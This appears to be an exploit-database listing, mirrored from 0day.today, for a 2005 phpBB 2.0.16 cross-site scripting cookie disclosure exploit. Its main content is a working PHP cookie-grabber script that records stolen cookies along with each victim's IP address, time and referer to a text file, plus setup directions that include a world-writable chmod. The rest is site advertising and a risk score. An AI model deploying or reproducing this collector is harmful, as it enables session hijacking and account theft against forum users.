Lucene search

phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)

🗓️ 13 Jul 2005 00:00:00Reported by Sjaak RakeType

zdt🔗 0day.today👁 67 Views

phpBB 2.0.16 XSS Remote Cookie Disclosure Exploi

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

=====================================================================
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
=====================================================================




<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

//rename it to cookies.php and create one new file steal.php and chmod it to 777



#  0day.today [2018-01-01]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

13 Jul 2005 00:00Current

7.1High risk

Vulners AI Score7.1